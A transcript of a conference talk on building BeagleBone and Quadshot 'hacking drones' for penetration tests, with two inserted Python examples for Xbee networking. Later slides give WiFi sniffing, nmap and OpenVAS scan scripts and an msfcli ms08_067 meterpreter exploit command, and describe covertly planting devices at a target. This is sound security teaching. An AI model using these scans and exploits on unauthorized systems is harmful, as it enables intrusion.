Autonomous Remote Hacking Drones - Dr. Phil Polstra
Are you tired of running pentests from a van outside your target? Working 24x7 hunched over your laptop got you down? Wouldn't you rather drop a few hacking devices outside/inside your target and monitor the test poolside at your hotel down the street? This talk will show you how to build inexpensive hacking drones that can be controlled from up to a mile away and can be run for days on batteries. Devices can be used as pentesting desktops, hacking drones, or dropboxes with no software changes. Drone costs range from $45-$85. All hardware and software used is open source.

Published in: Technology
Transcript

  • 1. Autonomous Remote Hacking Drones - Dr. Phil Polstra (@ppolstra), Bloomsburg University of Pennsylvania
  • 2. What is this talk about?
    ◦ Hacking and/or forensics with small, low-power devices
    ◦ ARM-based BeagleBoard and BeagleBone running a full suite of security/forensics tools
    ◦ Performing coordinated attacks with networks of devices
    ◦ Using aerial drones for performing and supporting attacks
    ◦ Leveraging Python to make attacks semi-autonomous
  • 3. Why You Should Care
    ◦ A full-featured Linux install for flexibility
    ◦ Low-power devices can run for days on battery power
    ◦ Small devices can be planted for later retrieval
    ◦ A network of devices enhances hacking from a distance
    ◦ An aerial drone can be flown around the target
      ▪ Can be useful for initial reconnaissance
      ▪ May be the only practical way to access certain targets
    ◦ An aerial drone can be landed nearby (roof?)
      ▪ Remote hacking drone
      ▪ Router for other drones planted nearby
      ▪ Combination router and drone
  • 4. Who am I?
    ◦ Professor at Bloomsburg University of Pennsylvania
    ◦ Programming from age 8
    ◦ Hacking hardware from age 12
    ◦ Also known to fly and build airplanes
  • 5. Roadmap
    ◦ Choosing a hacking platform
    ◦ Aircraft choices
    ◦ The Deck – your new favorite pen testing distro
    ◦ Solo ops with The Deck
    ◦ Networking with 802.15.4
    ◦ Building drones
    ◦ Attacking with an army of devices running The Deck
    ◦ Aerial drone scenarios
    ◦ Making attacks more autonomous with Python
  • 6. Choosing a Hacking Platform
    ◦ Small
    ◦ Low-power
    ◦ Affordable
    ◦ Mature
    ◦ Networking built in
    ◦ Good USB support
    ◦ Convenient input and output
  • 7. And the Winning Platform is...
    ◦ BeagleBone Black
      ▪ 3.4" x 2.1"
      ▪ <10 W (board itself <2 W)
      ▪ Only $45
      ▪ Based on a 1 GHz Cortex-A8
      ▪ 512 MB RAM
      ▪ 100 Mbps Ethernet built in
      ▪ High-speed USB plus USB On-The-Go
      ▪ HDMI and LCD output
      ▪ RS-232, webcam, plentiful GPIO, and microSD
  • 8. BeagleBone Black (aka Raspberry Pi killer)
  • 9. I know at least one of you will ask...
    ◦ Why not Raspberry Pi?
      ▪ Not as powerful
      ▪ Doesn't run Ubuntu (ARMv6 not supported)
      ▪ Not truly open (Broadcom won't release info)
      ▪ Not as mature
      ▪ Raspberry Pi costs more to build a full system
      ▪ Still limited availability (especially in the USA)
      ▪ Not as reliable (reported quality and power issues)
      ▪ Inefficient – uses more power despite running at a lower clock speed
      ▪ Limited GPIO
      ▪ GPIO is not buffered (easy to fry boards)
      ▪ Fragile design (pins vs. headers)
      ▪ Not as compact
  • 10. Choosing an Aircraft
    ◦ Good payload
    ◦ Can fly in windy conditions
    ◦ Capable of vertical takeoff/landing (VTOL)
    ◦ Reasonable flight time
    ◦ Space for BeagleBone Black
    ◦ Space for Xbee
    ◦ Space for Alfa WiFi adapter
    ◦ Affordable
  • 11. And the winning aircraft is...
  • 12. Quadshot
    ◦ Flying wing with VTOL
    ◦ Good wind tolerance
    ◦ Half a pound of payload
    ◦ Flight as an airplane is more energy efficient and helps in high winds (8-15 minutes)
    ◦ Some models use Xbee
    ◦ Built-in camera mount
  • 13. The Deck – Your New Favorite Distro
    ◦ Originally developed for BeagleBoard-xM
    ◦ Ported to run on BeagleBone Black
    ◦ Optimized for the Beagles
      ▪ Not someone's half-way effort to port a desktop distro
      ▪ Desktop or drone
    ◦ All the packages you need (over 1600)
    ◦ Based on Ubuntu
      ▪ Good repository support
      ▪ Good community support
      ▪ Minimizes the need to build tools from source
    ◦ Running latest kernels
  • 14. Demo 1 – Our Favorite Exploit
  • 15. Demo 1 (contd.)
  • 16. Demo 1 (contd.)
  • 17. Demo 2 – WiFi Cracking
  • 18. Demo 2 (contd.)
  • 19. Demo 2 (contd.)
  • 20. Demo 3 – Password Cracking
  • 21. Demo 4 – WPS Cracking
  • 22. Demo 4 (contd.)
  • 23. Demo 5 – Pwn Win7 Like It's a Mac
  • 24. Demo 5 (contd.)
  • 25. Demo 6 – Clickiddies(tm)
  • 26. 802.15.4 Networking
    ◦ Basics
    ◦ Hardware
    ◦ Simple case: 2 Xbee adapters
    ◦ Slightly harder case: multiple adapters, one at a time
    ◦ Hard case: multiple adapters simultaneously
    ◦ Really hard case: true mesh network
  • 27. 802.15.4 Basics
    ◦ Typically used in low-power embedded systems
    ◦ Regular (300 ft) and Pro (1 mi) versions
    ◦ AT and API modes of operation
    ◦ Low-speed (250 kbps max)
    ◦ Supports multiple network topologies
      ▪ Peer to peer
      ▪ Star
      ▪ Mesh
  • 28. Xbee Hardware
  • 29. Xbee Hardware (contd.)
    ◦ Manufactured by Digi
    ◦ Regular and Pro formats are interchangeable and interoperable
    ◦ Power consumption at 3.3 V is 50/295 mA for regular/Pro
    ◦ Uses 2 mm pin spacing
      ▪ Most breadboards are 0.1" or 2.54 mm
      ▪ Requires an adapter
    ◦ Several antenna options
    ◦ Be careful not to mix S1 with S2 (ZB) series, which have the same dimensions but are not compatible
  • 30. Series 1 vs. Series 2
    ◦ Series 1 (the original)
      ▪ Slightly higher power consumption (50 vs. 40 mA) for the regular version
      ▪ Works out of the box
      ▪ Not true mesh networking
    ◦ Series 2 (2B and ZB)
      ▪ Must have firmware loaded for each function (coordinator, router, end device)
      ▪ Every network must have a coordinator
      ▪ Coordinators and routers may not go to sleep
      ▪ Recommended for larger pen tests
  • 31. Simple Case: 2 Xbee Adapters
    ◦ Xbee modules must be configured for the desired network topology
    ◦ Digi provides X-CTU software for configuration, but it only runs on Windows (or use Wine)
    ◦ Recently Moltosenso has released Network Manager IRON 1.0, which runs on Linux, Mac, and Windows – the free edition is sufficient for our limited usage
  • 32. Configuring Xbee Modules
    ◦ Place the Xbee module in a USB adapter and connect to a PC running X-CTU or IRON
    ◦ Select the correct USB port and set the baud rate (default is 9600)
    ◦ From the Modem Configuration tab select Read to get the current configuration
    ◦ Ensure the modem is XB24 and the Function Set is XBEE 802.15.4 for Series 1
    ◦ Set the channel and PAN ID (1337?), noting that these settings must be the same for all modems
    ◦ Pick a Destination Low and Destination High address for the other adapter (say 2 and 0)
    ◦ Set the My Address to a chosen value (say 01)
    ◦ Click Write to store the new config on the Xbee
    ◦ Repeat this process on the second Xbee but reverse the addresses
    ◦ The modules should now talk to each other just fine
  • 33. Configuring Xbee Modules (contd.)
  • 34. Simple Case: Accessing Your Single Drone
    ◦ By default Xbee adapters operate in transparent mode
    ◦ Set up a TTY on the drone and you can log in with a terminal program
      ▪ Simple
      ▪ Works with interactive programs
      ▪ If you go out of range you are still connected when you return
  • 35. Starting a TTY on Your Drone
    ◦ Create an Upstart job file in /etc/init (ttyO2.conf) with the following:

```
# ttyO2 - getty
#
# This service maintains a getty on ttyO2 from the point the system is
# started until it is shut down again.

start on stopped rc RUNLEVEL=[2345]
stop on runlevel [!2345]

respawn
exec /sbin/getty -8 57600 ttyO2
```

    ◦ Start with "sudo start ttyO2" (letter O, not a zero!)
    ◦ Use your favorite terminal program to connect
  • 36. Slightly Harder Case: Multiple Drones One at a Time
    ◦ Configure drones as in the single-drone case but with different MY addresses
    ◦ Use a terminal program on the command console to connect to drones one at a time
    ◦ Simple: no programming required
    ◦ Must enter AT command mode to switch between drones
      ▪ Enter "+++" (no Enter) and wait for OK
      ▪ Enter "ATDL0002 <enter>" to select drone 2
      ▪ Enter "ATWR <enter>" to write to NVRAM
      ▪ Enter "ATCN <enter>" to exit command mode
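One way to script the pairing settings from slide 32 and the drone-switching sequence from slide 36 (an added example, not the talk's MeshDeck code). It assumes Series 1 radios with 16-bit addressing (DH = 0), the 1-second guard time around "+++" documented for XBee 802.15.4 modules, and a pyserial-like port object with write()/readline(); FakeXbeePort is a constructed stand-in so the flow runs without a radio.

```python
# Added example, not the talk's MeshDeck code.  Plans Series 1 Xbee settings for a
# controller plus several drones in AT (transparent) mode and drives the command-mode
# sequence that retargets the controller's radio at a chosen drone.
# Assumptions: 16-bit addressing (MY/DL, DH = 0), the 1 s guard time around "+++"
# documented for XBee 802.15.4 modules, a pyserial-like port with write()/readline().
import time

GUARD_TIME = 1.0                 # seconds of silence required before and after "+++"
RESERVED_MY = {0xFFFE, 0xFFFF}   # setting MY to either value disables 16-bit addressing
CH_MIN, CH_MAX = 0x0B, 0x1A      # channel range of the regular (non-Pro) Series 1 module

def plan_network(channel, pan_id, controller_my, drone_mys):
    """Return {name: {CH, ID, MY, DH, DL}} for the controller and every drone.

    All radios share CH and ID (slide 32); each drone's DL points at the controller
    and the controller's DL starts at the first drone, to be retargeted later.
    """
    if not CH_MIN <= channel <= CH_MAX:
        raise ValueError("channel 0x%02X outside 0x%02X..0x%02X" % (channel, CH_MIN, CH_MAX))
    if not 0 <= pan_id <= 0xFFFF:
        raise ValueError("PAN ID must fit in 16 bits")
    if not drone_mys:
        raise ValueError("need at least one drone")
    addrs = [controller_my] + list(drone_mys)
    for a in addrs:
        if not 0 <= a <= 0xFFFF or a in RESERVED_MY:
            raise ValueError("invalid 16-bit MY address 0x%04X" % a)
    if len(set(addrs)) != len(addrs):
        raise ValueError("MY addresses must be unique")
    plan = {"controller": {"CH": channel, "ID": pan_id, "MY": controller_my,
                           "DH": 0, "DL": drone_mys[0]}}
    for i, my in enumerate(drone_mys, 1):
        plan["drone%d" % i] = {"CH": channel, "ID": pan_id, "MY": my,
                               "DH": 0, "DL": controller_my}
    return plan

def can_talk(a, b):
    """True when a and b share a network and each one's DL is the other's MY."""
    same_net = a["CH"] == b["CH"] and a["ID"] == b["ID"]
    mirrored = a["DH"] == 0 and b["DH"] == 0 and a["DL"] == b["MY"] and b["DL"] == a["MY"]
    return same_net and mirrored

def select_drone_commands(drone_my):
    """The slide 36 sequence: enter command mode, point DL at the drone, save, leave."""
    return [b"+++", b"ATDL%04X\r" % drone_my, b"ATWR\r", b"ATCN\r"]

def retarget(port, drone_my, sleep=time.sleep):
    """Send the sequence over a serial-like port, honoring guard times and checking OK."""
    replies = []
    for cmd in select_drone_commands(drone_my):
        if cmd == b"+++":
            sleep(GUARD_TIME)           # no characters for 1 s before...
            port.write(cmd)
            sleep(GUARD_TIME)           # ...and 1 s after, or the radio ignores it
        else:
            port.write(cmd)
        reply = port.readline().strip()
        replies.append(reply)
        if reply != b"OK":
            raise RuntimeError("%r answered %r, expected OK" % (cmd, reply))
    return replies

class FakeXbeePort:
    """Constructed stand-in for a pyserial port so the flow runs without a radio."""
    def __init__(self):
        self.written = []
    def write(self, data):
        self.written.append(data)
    def readline(self):
        return b"OK\r"

if __name__ == "__main__":
    plan = plan_network(0x0C, 0x1337, 1, [2, 3])
    for name, cfg in plan.items():
        print(name, " ".join("%s=%04X" % kv for kv in cfg.items()))
    print(retarget(FakeXbeePort(), 3, sleep=lambda s: None))
```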
  • 37. Slightly Harder Case: Multiple Drones Simultaneously
    ◦ API mode is used vs. AT mode
    ◦ Configure the Xbee with X-CTU
      ▪ For Series 1 stick with the 802.15.4 Function Set
      ▪ For Series 2 (ZB): drones set to Function Set ZNET 2.5 ROUTER/ENDDEVICE API 1347, controller set to Function Set ZNET 2.5 COORDINATOR API 1147
      ▪ A router can be used to extend range to the command console
    ◦ Multiple choices for communication
      ▪ Java xbee-api
      ▪ Python-xbee (what I used)
      ▪ Raw commands to the TTY device
    ◦ Recommended for most situations involving 3 or more devices
  • 38. Multiple Drone Communications
    ◦ Really this is a point-to-multipoint topology
    ◦ For each drone, communication appears to be simple peer-to-peer
    ◦ API mode provides better performance and allows simpler software operation
  • 39. Multiple Drones Using Python: One Possibility
    ◦ Each drone runs a simple Python script which waits for commands and sends announcements
    ◦ The controller listens for announcements/responses and sends commands (all activity is logged)
    ◦ Upside is that it lends itself easily to scripting
    ◦ Downside is that it doesn't support interactive shells (yet)
    ◦ Announcements can be sent to the controller for important events (such as successful cracking)
    ◦ Code is available at https://github.com/ppolstra
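The command/announcement exchange of slides 38 and 39, as an added example that is not the MeshDeck code from github.com/ppolstra: an application-layer framing for API mode that splits a message into frames that fit the radio payload, reassembles them on the controller even when they arrive out of order, drops duplicates and junk, and logs every message. It assumes a 100-byte RF payload per frame (Series 1 in API mode), drones identified by their 16-bit MY address, and python-xbee handing up each frame's payload as bytes; the sample messages are constructed.

```python
# Added example (not the MeshDeck code): application-layer framing for the
# drone <-> controller exchange over 802.15.4 API mode.
# Assumptions: 100-byte RF payload per frame (Series 1 API mode), drones are
# identified by their 16-bit MY address, python-xbee delivers each frame's
# payload as bytes.  Transport is left to python-xbee; only framing is shown.
import struct
import datetime

MAX_PAYLOAD = 100
HEADER = struct.Struct("!BHHBB")     # kind, drone MY, message seq, fragment index, fragment count
CHUNK = MAX_PAYLOAD - HEADER.size    # bytes of message text per frame
KIND_CMD, KIND_RESP, KIND_ANNOUNCE = 1, 2, 3
KIND_NAMES = {KIND_CMD: "CMD", KIND_RESP: "RESP", KIND_ANNOUNCE: "ANNOUNCE"}

def encode(kind, drone_my, seq, text):
    """Split one message into frames that each fit in a single RF payload."""
    if kind not in KIND_NAMES:
        raise ValueError("unknown message kind %r" % kind)
    body = text.encode("utf-8")
    parts = [body[i:i + CHUNK] for i in range(0, len(body), CHUNK)] or [b""]
    if len(parts) > 255:
        raise ValueError("message needs more than 255 fragments")
    return [HEADER.pack(kind, drone_my, seq, i, len(parts)) + p
            for i, p in enumerate(parts)]

class Reassembler:
    """Rebuilds messages from frames; tolerates reordering, drops duplicates and junk."""
    def __init__(self):
        self.pending = {}      # (drone MY, seq) -> {fragment index: bytes}
        self.delivered = set()

    def feed(self, frame):
        """Return (kind, drone_my, seq, text) once a message is complete, else None."""
        if len(frame) < HEADER.size:
            return None
        kind, my, seq, idx, count = HEADER.unpack_from(frame)
        if kind not in KIND_NAMES or count == 0 or idx >= count:
            return None
        key = (my, seq)
        if key in self.delivered:
            return None        # retransmission of a message already handed up
        frags = self.pending.setdefault(key, {})
        frags[idx] = frame[HEADER.size:]
        if len(frags) < count:
            return None
        del self.pending[key]
        self.delivered.add(key)
        text = b"".join(frags[i] for i in range(count)).decode("utf-8", "replace")
        return kind, my, seq, text

class Controller:
    """Controller side of slide 39: logs every announcement/response it reassembles."""
    def __init__(self, clock=None):
        self.rx = Reassembler()
        self.log = []
        self.clock = clock or (lambda: datetime.datetime.now(datetime.timezone.utc).isoformat())

    def receive(self, frame):
        msg = self.rx.feed(frame)
        if msg is not None:
            kind, my, seq, text = msg
            self.log.append("%s drone=%04X seq=%d %s: %s"
                            % (self.clock(), my, seq, KIND_NAMES[kind], text))
        return msg

if __name__ == "__main__":
    # Constructed sample: drone 0x0002 announces a finished job in three fragments
    # that arrive out of order; the controller logs it once and ignores the repeat.
    ctl = Controller()
    frames = encode(KIND_ANNOUNCE, 0x0002, 7, "job 3 finished: " + "report " * 30)
    for f in reversed(frames):
        ctl.receive(f)
    ctl.receive(frames[0])
    print("\n".join(ctl.log))
```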
  • 40. Harder Case: True Mesh Network
    ◦ Recommended when using a larger number of drones or when devices are too far apart
    ◦ Devices configured as routers or coordinators will have reduced battery life (no sleep)
    ◦ Requires Series 2 (2B or ZB) Xbee adapters
    ◦ No changes to scripts are required
  • 41. True Mesh Networking (contd.)
    ◦ At least one modem must have coordinator firmware
    ◦ Routers can extend range
      ▪ Pro adapters recommended
      ▪ Drones can use regular adapters to save power
      ▪ Routers need not be connected to a drone
    ◦ Easier to leverage Xbee adapter sleep modes on end devices
  • 42. Building Drones
  • 43. Getting The Deck
    ◦ Download the archive from http://sourceforge.net/projects/thedeck/
      ▪ Also download the MeshDeck if using 802.15.4
      ▪ Note: apt archives removed to save 1.7 GB of space
    ◦ Upload The Deck to a microSD card
      ▪ Class 10, 8 GB or larger
      ▪ Extract the archive to your Linux box
      ▪ From your Linux box run "sudo ./setup_sd.sh --mmc /dev/sdX --uboot bone"
      ▪ Will take a while (20-30 minutes)
    ◦ Ready-to-run microSD cards are also available at https://specialcomp.com/beagleboard/thedeck.htm
    ◦ If running the MeshDeck
      ▪ Extract the archive to the drone
  • 44. Power Your Drones
    ◦ Beagles take a standard 2.1 x 5.5 mm barrel connector
    ◦ Battery voltage above 5 V is wasted as heat
    ◦ Bare board can run for several days off standard batteries (~220 mA)
    ◦ LCD touchscreens require lots of power!
    ◦ Leeching off of USB power from a target is ideal
    ◦ Be careful with WiFi and 802.15.4
      ▪ Set transmit power to minimum
      ▪ Take advantage of sleep modes on 802.15.4 radios
  • 45. Power Options

      Battery size    Approx. runtime
      D               54.5 hrs
      C               27.3 hrs
      AA              13.6 hrs
      9V or AAA       6.8 hrs
      Lantern         50 hrs
      USB 5200        23.6 hrs

  • 46. 802.15.4 Hardware
  • 47. 802.15.4 Hardware
  • 48. Xbee Adapters
    ◦ UART (serial) adapters
      ▪ Can be wired directly to Beagles using 4 wires
      ▪ Don't take up USB ports
      ▪ Xbee cape out soon
  • 49. Xbee Adapters (contd.)
    ◦ USB adapters
      ▪ More expensive
      ▪ Helpful for initial setup of the modem
      ▪ Easier to set up: just plug it in
      ▪ Laptop connection
  • 50. Wiring the Xbee to Beagles
    ◦ If you splurged for the USB adapter you can just plug in to a USB port
      ▪ BeagleBone has only 1 USB port, which you might want for something else (WiFi?)
      ▪ BeagleBoard has 4 USB ports
    ◦ Using the UART interface is slightly more complicated
      ▪ Connect 4 wires: 3.3 V, Ground, TX, RX
      ▪ Configure the Beagle multiplexer for proper operation
    ◦ If you have an Xbee cape just plug it in
  • 51. Setting up a UART Interface
    ◦ Appropriate pins and modes are in the Beagle manuals
    ◦ For BeagleBone UART2
      ▪ 3.3 V and Ground: P9 pin 3 and pin 1, respectively
      ▪ TX: P9 pin 21 (to Xbee Din)
      ▪ RX: P9 pin 22 (to Xbee Dout)
    ◦ Add the following lines to /etc/rc.local BEFORE the exit 0 at the end:

```
# setup the MeshDeck drone
echo BB-UART2 > /sys/devices/bone_capemgr.8/slots
sleep 2
/etc/init.d/meshdeckd start
```

  • 52. Capes
    ◦ Work in progress
    ◦ Xbee cape with socket for Xbee radio
    ◦ Pwnage cape
      ▪ Xbee socket
      ▪ Network switch for installing inline
      ▪ USB hub
      ▪ Optional 802.11 wireless
    ◦ AirDeck cape to fly aerial drone
  • 53. Containers
  • 54. Containers
  • 55. Plantables
  • 56. Plantables
  • 57. Building the AirDeck
    ◦ If you only want a router to extend range
      ▪ Buy the Xbee board from Transition Robotics
      ▪ Program the Xbee modem as a router
      ▪ Install the board
    ◦ To install a drone on the Quadshot you will need
      ▪ BBB
      ▪ Xbee modem
      ▪ Xbee cape (either DIY or purchased)
      ▪ Alfa AWUS036H wireless adapter
      ▪ 2.1 x 5.5 mm barrel connector for power
      ▪ Short (3-6") micro-USB A-B cable
  • 58. AirDeck (contd.)
    ◦ Entire setup installed on the brain cover
    ◦ Place the BBB on the cover as shown and mark the 4 hole locations with a 1/8" drill bit
    ◦ Connect to the lid using 4-40 screws and standoffs or similar
      ▪ 3 nuts per screw
      ▪ 1 on the outside to secure the screw
      ▪ 2 to lock the BBB on the lid
  • 59. AirDeck (contd.)
    ◦ Remove the BBB from the lid
    ◦ Take the Alfa out of its case
    ◦ Test fit it to the inside of the cover as shown
    ◦ Mark the location of the 3/8" hole for the antenna
    ◦ Drill the 3/8" hole, then install on the lid to mark the mount holes
    ◦ Drill the mount holes
    ◦ Install with 4-40 screws
    ◦ Seal with black tape to prevent shorting with the LIA board
  • 60. AirDeck (contd.)
    ◦ Cut notches for the power cable and USB cable as shown in the pictures using a rotary tool
    ◦ You may have to cut back the hard plastic and/or metal shield on the USB cable
    ◦ Solder the 2.1 x 5.5 mm barrel connector
      ▪ Center is connected to Vcc on the LIA
      ▪ Outer conductor is connected to Ground on the LIA
      ▪ UART connectors on the upper left are probably the best choice for connection
    ◦ Install the Xbee cape and secure with cable ties
    ◦ Install the lid and plug in the barrel connector
    ◦ Go forth and pwn!
  • 61. AirDeck Ready for Pwnage
  • 62. Networked Attacks – Simplest Case
    ◦ In the simplest case there is only 1 drone
    ◦ Networking is peer-to-peer
    ◦ Allows hacking from a distance
      ▪ Better WiFi hacking when the drone is in the building
      ▪ Drone runs 24x7
      ▪ Drone can run for days off battery
      ▪ Important updates such as successfully cracked passwords can be sent to the master periodically in case you weren't in range when they happened
    ◦ Drone has the full version of The Deck – lots of possibilities
    ◦ Less conspicuous than sitting outside the building
    ◦ If you are lucky you can patch into the wired network
      ▪ If you are extra lucky they use Power over Ethernet!
  • 63. Networked Attack with Multiple Drones
    ◦ One process on the master monitors status updates from all drones
    ◦ Interactive shell into each drone
      ▪ Multiple subshells can be created
      ▪ Processing continues if the master disconnects
    ◦ Endless possibilities since each drone has the full version of The Deck
    ◦ Drones are easily retasked based on objectives achieved by other drones
  • 64. Demo 7 - Trivial Example of Two Drones in TTY Mode
  • 65. Demo 8 - Trivial Example with Two Drones – API Mode Using Python
  • 66. Python Mode (continued)
  • 67. Python Mode (continued)
  • 68. Python Mode (continued)
  • 69. AirDeck Scenario 1
    ◦ Router-only mode
    ◦ Used to extend the range of drones planted near the target
      ▪ Drones may be using regular Xbee adapters to save power
    ◦ Flyby if there are no good landing spots nearby
    ◦ Land if possible
      ▪ Flat roof could be a good choice
      ▪ Router can run for days off the Quadshot battery
  • 70. AirDeck Scenario 2
    ◦ AirDeck is the only drone
    ◦ Useful when drones can't be easily planted
    ◦ Battery on the Quadshot allows extended operation
    ◦ Best situation allows you to land on a roof where the AirDeck isn't detected
    ◦ If you screw up and crash on the roof you may still be able to retrieve "your RC toy" from the target later
  • 71. AirDeck Scenario 3
    ◦ AirDeck combined with other drones
    ◦ Other drones are planted
      ▪ Inside, leeching power from the target
      ▪ Outside, running off of battery
    ◦ Other drones likely using regular Xbee adapters to save power
    ◦ AirDeck Xbee adapter configured as a coordinator or router
  • 72. Automating with Python
  • 73. Detecting Wireless Networks

```python
from scapy.all import Dot11, Dot11Elt, sniff

# create a list to store networks (BSSIDs) already seen
ap_list = []

# define a function to be called with each received packet
def packet_handler(pkt):
    # is this an 802.11 packet, in particular a beacon frame (type 0, subtype 8)?
    if pkt.haslayer(Dot11) and pkt.type == 0 and pkt.subtype == 8:
        # is this a network that I used to know?
        if pkt.addr2 not in ap_list:
            ap_list.append(pkt.addr2)
            # pkt.info is the SSID element; the third information element of a
            # beacon is normally the DS Parameter Set, whose single byte is the channel
            channel = ord(pkt[Dot11Elt:3].info)
            print("Network %s with ESSID %s detected on channel %d"
                  % (pkt.addr2, pkt.info.decode("utf-8", "replace"), channel))

# main function sniffs for a minute then exits
def main():
    print("Sniffing for wireless networks")
    # iface must be an interface already placed in monitor mode
    sniff(iface="mon0", prn=packet_handler, timeout=60)
    print("All done")

if __name__ == '__main__':
    main()
```
  • 74. Capturing Wireless Packets

```python
from scapy.all import Dot11, PcapWriter, sniff
import optparse

# create lists to store clients seen and packets captured
client_list = []
pkt_list = []

# define a function to be called with each received packet
def packet_handler(pkt):
    # keep every 802.11 frame; the BSSID/ESSID given on the command line only
    # name the output file, the capture itself is not filtered by them
    if pkt.haslayer(Dot11):
        pkt_list.append(pkt)
        # is this a client that I used to know? (addr2 is the transmitter)
        if pkt.addr2 is not None and pkt.addr2 not in client_list:
            client_list.append(pkt.addr2)
            print("Client: " + str(pkt.addr2) + " detected")
```

  • 75. Capturing Wireless Packets (contd.)

```python
def main():
    # parse command line options
    parser = optparse.OptionParser('usage %prog -b <BSSID> -e <ESSID>')
    parser.add_option('-b', dest='bssid', type='string', help='target BSSID')
    parser.add_option('-e', dest='essid', type='string', help='target ESSID')
    (options, args) = parser.parse_args()
    bssid = options.bssid
    essid = options.essid
    # if essid and bssid aren't specified exit
    if essid is None or bssid is None:
        print(parser.usage)
        exit(0)
    print("Capturing traffic for ESSID:%s BSSID:%s" % (essid, bssid))
    sniff(iface="mon0", prn=packet_handler, timeout=60)
    # write everything captured to <ESSID>.pcap
    pktcap = PcapWriter(essid + '.pcap', append=True, sync=True)
    pktcap.write(pkt_list)
    pktcap.close()
    print("All done")
    exit(0)

if __name__ == '__main__':
    main()
```
  • 76. Finding Out What's There

```python
import nmap, optparse, json

# live hosts found by the scan; saved to JSON for the vulnerability scan script
host_list = []

def main():
    # parse command line options
    parser = optparse.OptionParser('usage %prog -t <target host or network> -p <ports> -o <nmap options>')
    parser.add_option('-t', dest='target_net', type='string', help='target host or network')
    parser.add_option('-o', dest='nmops', type='string', help='additional nmap options')
    parser.add_option('-p', dest='ports', type='string', help='port(s) to scan')
    (options, args) = parser.parse_args()
    target_net = options.target_net
    nmops = options.nmops
    ports = options.ports
    # if no target is specified then exit
    if target_net is None:
        print(parser.usage)
        exit(0)
    # now perform the scan
    nm = nmap.PortScanner()
    # if arguments and ports aren't specified use some defaults
    if ports is None:
        ports = '1-1024'
    if nmops is None:
        nmops = '-sV -O'
    nm.scan(target_net, ports, nmops)
```

  • 77. Finding Out What's There (contd.)

```python
    # (continuation of main() from the previous slide)
    # print the results
    for host in nm.all_hosts():
        # if it isn't up don't bother to print anything about it
        if nm[host]['status']['state'] == 'up':
            host_list.append(nm[host])
            print('---------------------------------')
            if 'addresses' in nm[host]:
                print("live host detected at %s " % (nm[host]['addresses']['ipv4']))
            else:
                print("live host detected at %s " % (nm[host].hostname()))
            # now iterate over services
            if 'tcp' in nm[host]:
                print('TCP services detected on the following ports:')
                for port in nm[host]['tcp']:
                    print("Port: " + str(port))
                    for k, v in nm[host]['tcp'][port].items():
                        print("    " + str(k) + ": " + str(v))
            if 'udp' in nm[host]:
                print('UDP services detected on the following ports:')
                for port in nm[host]['udp']:
                    print("Port: " + str(port))
                    for k, v in nm[host]['udp'][port].items():
                        print("    " + str(k) + ": " + str(v))
    # save the live hosts for the next stage
    fp = open('nmap-scan.json', 'w')
    json.dump(host_list, fp)
    fp.close()

if __name__ == '__main__':
    main()
```
  • 78. Detecting the Vulnerable

```python
import optparse, json, time, xml.etree.ElementTree as ET
import openvas.omplib

host_list = []

def main():
    # parse command line options; the built-in help option is disabled so that
    # -h can be used for the OpenVAS host as the usage string says
    parser = optparse.OptionParser('usage %prog -u <OpenVAS user> -p <OpenVAS password> -h <OpenVAS host>',
                                   add_help_option=False)
    parser.add_option('-u', dest='user', type='string', help='OpenVAS user')
    parser.add_option('-h', dest='ovhost', type='string', help='OpenVAS host, default is localhost')
    parser.add_option('-p', dest='password', type='string', help='OpenVAS password')
    (options, args) = parser.parse_args()
    user = options.user
    password = options.password
    ovhost = options.ovhost
    # if no user specified then exit
    if user is None:
        print(parser.usage)
        exit(0)
    if ovhost is None:
        ovhost = 'localhost'
    # load the host list from the JSON file written by the nmap script
    fp = open('nmap-scan.json', 'r')
    host_list = json.load(fp)
    fp.close()
```

  • 79. Detecting the Vulnerable (contd.)

```python
    # (continuation of main() from the previous slide)
    # create the list of targets from nmap scan results
    targets = ""
    for host in host_list:
        targets += str(host['addresses']['ipv4']) + ','
    targets = targets.rstrip(',')
    # now do the scan
    manager = openvas.omplib.OMPClient(host=ovhost)
    manager.open(user, password)
    manager.create_target('nmap-targets', targets, 'targets detected by previous nmap scan')
    task_id = manager.create_task('openvas-scan', target='nmap-targets')
    report_id = manager.start_task(task_id)
    # it will take some time for this scan to run so check every minute
    while True:
        time.sleep(60)
        status = manager.get_task_status(task=task_id)
        if "done" in status.values():
            break
    report = manager.get_report(report_id)
    print(ET.tostring(report, encoding="unicode"))

if __name__ == '__main__':
    main()
```
  • 80. Script-based Exploitation
    ◦ General format:

```
msfcli exploit/<platform>/<type>/<exploit> RHOST=<target address> PAYLOAD=<platform>/<payload>/<bind method> OPTIONX=something OPTIONY=something
```

    ◦ e.g.:

```
msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.168.10.103 PAYLOAD=windows/meterpreter/bind_tcp
```
  • 81. Future Directions
    ◦ Continue to add useful packages as need arises
    ◦ Optimize some packages for BB-xM/BBB
    ◦ Optimize and expand 802.15.4 code
    ◦ Other output devices
    ◦ Exploit USB OTG functionality
    ◦ Replace the LIA autopilot with a BBB in the AirDeck drone
    ◦ Hack over the Internet with an 802.15.4 gateway
  • 82. Coming Soon – Use coupon code CNF314 for 30% off this and ANY Syngress title
  • 83. Questions? Feel free to track me down during the con or @ppolstra later
